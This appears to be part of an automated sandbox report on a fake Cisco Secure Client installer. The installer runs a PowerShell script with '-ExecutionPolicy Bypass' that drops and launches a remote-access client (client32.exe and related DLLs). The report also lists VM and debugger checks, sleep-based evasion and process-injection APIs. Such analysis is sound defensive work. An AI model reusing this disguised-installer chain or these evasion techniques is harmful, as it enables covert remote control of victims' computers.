                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1N4FB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2J155.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-VTDA9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-8OL4N.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3NCDE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MMI8M.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-T9GPQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RDO3H.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-50H6H.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-H5812.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2TJID.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OTMTE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q2D0Q.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UM1NO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-V8S0O.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VFI6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MGVA1.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-53P9C.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S9VDU.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MKOUV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S996S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D2T5K.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_6-102599
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_6-105594
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_6-105818
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_6-105976
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-102542
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI coverage: 5.6 %
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI coverage: 3.0 %
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68904F306_2_68904F30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 4856Thread sleep time: -64000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 4948Thread sleep time: -43600s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 4856Thread sleep time: -2000000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68903130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 68903226h6_2_68903130
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,6_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,6_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102D059 PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D059
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102CEB1 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CEB1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,9_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,9_2_110BC3D0
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMware
                                  Source: client32.exe, 00000006.00000002.4598399799.0000000005196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{
                                  Source: client32.exe, 00000009.00000003.2496832834.0000000000540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: client32.exe, 00000006.00000002.4598399799.0000000005196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMWare
                                  Source: client32.exe, 00000006.00000002.4584818110.000000000048E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                  Source: client32.exe, 0000000A.00000002.2578179566.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.2577187485.00000000005DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                                  Source: CiscoSetup.tmp, 00000002.00000003.2541285182.00000000010C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
                                  Source: powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lP
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end nodegraph_6-105369
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end nodegraph_6-105491
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,6_2_110CFCF0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11178A14 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_11178A14
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11030B10 SetUnhandledExceptionFilter,6_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689128E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_689128E1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689187F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_689187F5
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68B40807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_68B40807
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11030B10 SetUnhandledExceptionFilter,9_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1115E4D1

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Bypasses PowerShell execution policy
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,6_2_110F2280
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110F410 GetKeyState,DeviceIoControl,keybd_event,6_2_1110F410
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_1109DC20
                                  Source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: client32.exe, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Progman
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11170208
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11170499
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,6_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_11170106
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_111701AD
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_11170011
